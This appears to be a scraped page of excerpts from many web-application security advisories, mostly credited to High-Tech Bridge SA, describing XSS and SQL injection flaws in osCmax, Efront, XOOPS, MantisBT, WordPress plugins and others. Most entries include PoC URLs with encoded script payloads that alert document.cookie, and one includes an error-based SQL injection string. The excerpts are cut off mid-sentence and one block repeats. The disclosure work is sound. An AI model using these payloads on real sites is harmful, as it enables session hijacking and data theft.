Next Page >>
script code
The following PoC code is available:
http://[host]/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+
3) Input passed via the "mode" GET parameter to contact_support.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website.
The following PoC code is available:
http://[host]/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
the context of an affected site.
2) Input passed to the "orderdirection" and "listorder" parameters in
"www/admin/userlog-index.php" and "www/admin/stats.php" is not
properly sanitised before being returned to the user. This can be
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/login.php?action=process" method="post" name="main" id="main">
Details:
========
Multiple persistent input validation vulnerabilities are detected in Astaro Command Center v2.x.
The bugs allows an local privileged attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires user inter action & minimum restricted access to the panel.
Vulnerable Module(s):
[+] Configuration - Networks Definition
Details:
========
Multiple persistent input validation vulnerabilities are detected in Astaro Command Center v2.x.
The bugs allows an local privileged attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires user inter action & minimum restricted access to the panel.
Vulnerable Module(s):
[+] Configuration - Networks Definition
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Efront, which can be exploited to perform sql injection and cross-site scripting attacks.
1) Input passed via the "course" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?ctg=lesson_info&lessons_ID=1&course=%27%20onmouseover%3dalert%28document.cookie%29%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in PHPShop CMS Free, which can be exploited to perform cross-site scripting, sql injection attacks.
1) Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The following PoC code is available:
http://[host]/phpshop/admpanel/banner/adm_baner_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/phpshop/admpanel/gbook/adm_gbook_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Open-Realty, which can be exploited to perform cross-site scripting and SQL Injection attacks.
1) Input passed via the "name", "email", "friend_email", "subject", "message" POST parameters to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
<form action="http://[host]/index.php?action=contact_friend&popup=yes&listing_id=1" method="post">
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pretty Link WordPress Plugin, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "min_date" GET parameter to /wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
For demonstration or reproduce ...
Code Review: Users - User Listing
<div style="display: inline; vertical-align: middle; white-space: nowrap; padding: 4px 2px 4px 0px;">>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>
</div> <span>Known IP addresses of user '>"<INCLUDE PERSISTENT SCRIPTCODE HERE!!!>'</iframe></span>
Code Review: Add New Network Listing
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in miniblog, which can be exploited to perform cross-site scripting & cross-site request forgery attacks.
1) Input passed via the GET "post_list" parameter to /adm/list.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/adm/list.php?post_list=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Browser CRM, which can be exploited to perform cross-site scripting, sql injection attacks.
1) Input appended to the URL after multiple files is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site
The following PoC code is available:
http://[host]/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/modules/admin/admin_module_index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerability requires the attacker to be logged-in and have access to "Manage Albums" function.
3) Multiple XSS in ZENphoto: CVE-2012-0995
3.1 Input passed via the "msg" GET parameters to /zp-core/admin.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC is available:
http://[host]/zp-core/admin.php?action=external&error&msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
1) Multiple Cross-Site Scripting (XSS) in XOOPS: CVE-2012-0984
1.1 Input passed via the "to_userid" POST parameter to /modules/pm/pmlite.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
<form action='http://[host]/modules/pm/pmlite.php' method="post">
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Dotclear, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Cross-Site Scripting (XSS) in Dotclear: CVE-2012-1039
1.1 Input passed via the "login_data" POST parameter to /admin/auth.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/auth.php" method="post">
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in All-in-One Event Calendar Plugin for WordPress, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Cross-Site Scripting (XSS) in All-in-One Event Calendar Plugin for WordPress: CVE-2012-1835
1.1 Input passed via the "title" GET parameter to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436
1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Details:
========
Multiple persistent Input Validation vulnerabilities are detected on Barracudas CudaTel Phone Application v3.0.028.001.
Local low privileged user accounts can implement/inject malicious script code to manipulate modules via persistent context
requests. When exploited by an authenticated user, the identified vulnerabilities can result in information disclosure via error,
session hijacking, access to available phone line services, manipulated persistent context execution out of the auto route listings.
Vulnerable Module(s):
[+] Automated Attendants
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BugFree , which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "ActionType" GET parameter to Bug.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/Bug.php?BugID=1&ActionType=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
be exploited to insert arbitrary HTML and script code, which will be
executed in a user's browser session in context of an affected site
when the malicious data is being viewed.
3) Input passed via the "art" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
--------------
Vulnerability:
--------------
1. The login page is vulnerable to cross site scripting.
2. script code can be embedded into messages.
3. script code can be embedded into milestones.
4. script code can be embedded into a users display name.
5. The application is vulnerable to cross site request forgery.
A project e.g. can be deleted with a simple GET request (see PoC).
Combined with the XSS vulnerabilies, the code can be embedded into
2) Multiple Cross-Site Scripting (XSS) in Piwigo: CVE-2012-2209
2.1 Input passed via the "section" GET parameter to admin.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/admin.php?page=configuration§ion=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Traq, which can be exploited to perform cross-site scripting and sql injection attacks.
1) Input passed via the "edit" GET parameter is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a administrator browser session in context of affected website.
The following PoC code is available:
http://[host]/admincp/components.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admincp/ticket_templates.php?edit=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Details:
========
Multiple persistant input validation vulnerabilities are detected on
Kloxos LxCenter Server CP v6.1.10.
The bug allows remote attacker to implement malicious script code on the
application side (persistent).
Successful exploitation of the vulnerability allows an attacker to
manipulate modules/context (persistent) & can
lead to session hijacking (user/mod/admin).
http://[host]/settings/settings_index.php?cal_alert=%27%20SQL_CODE_HERE&cal_first_hour=0&cal_interval=4&cal_last_hour=1&commentorder=0&csv_sep=%3b&date=Y-m-d&date_upd=Y-m-d&debug_exe=16&debug_id=1&debug_param=2&debug_sess=4&debug_solr=32&debug_sql=8&display=yes&dsrc=0&form_user_pref=1&mail=yes&mail_participation=yes&menu=text&public_fb=yes&rows=10&sel_display_days=1111111&submit=Validate&timeformat=12H&timezone=Africa%2fAbidjan&todo=todo_priority
Successful exploitation of this vulnerabilities requires attacker to be registered and logged-in, as well as "magic_quotes_gpc" to be disabled.
8) Input passed via the "tf_delegation", "tf_ip", "tf_name" GET parameters to /host/host_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=%22%20onmouseover=alert%28document.cookie%29;%22&tf_ip=&tf_name=
http://[host]/host/host_index.php?action=search&cb_backup_ftp=1&cb_imap=1&cb_imap_frontend=1&cb_monitor=1&cb_obm_sync=1&cb_smtp_in=1&cb_smtp_out=1&cb_solr=1&popup=&submit=Find&tf_delegation=&tf_ip=%22%20onmouseover=alert%28document.cookie%29;%22&tf_name=
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
1) Input passed via the "uniqcode" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?menu_no_top=eim&uniqcode=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in eShop for Wordpress, which can be exploited to perform cross-site scripting attacks against logged-in Wordpress Administrator.
1) Input passed via the "eshoptemplate" GET parameter to /wp-admin/admin.php (when "page" is set to "eshop-templates.php") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a administrator's browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-admin/admin.php?page=eshop-templates.php&eshoptemplate=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT, which can be exploited to perform cross-site scripting, local file inclusion attacks.
1) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Tine 2.0, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the "lang" GET parameter to /library/idnaconvert/example.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Next Page>>
|
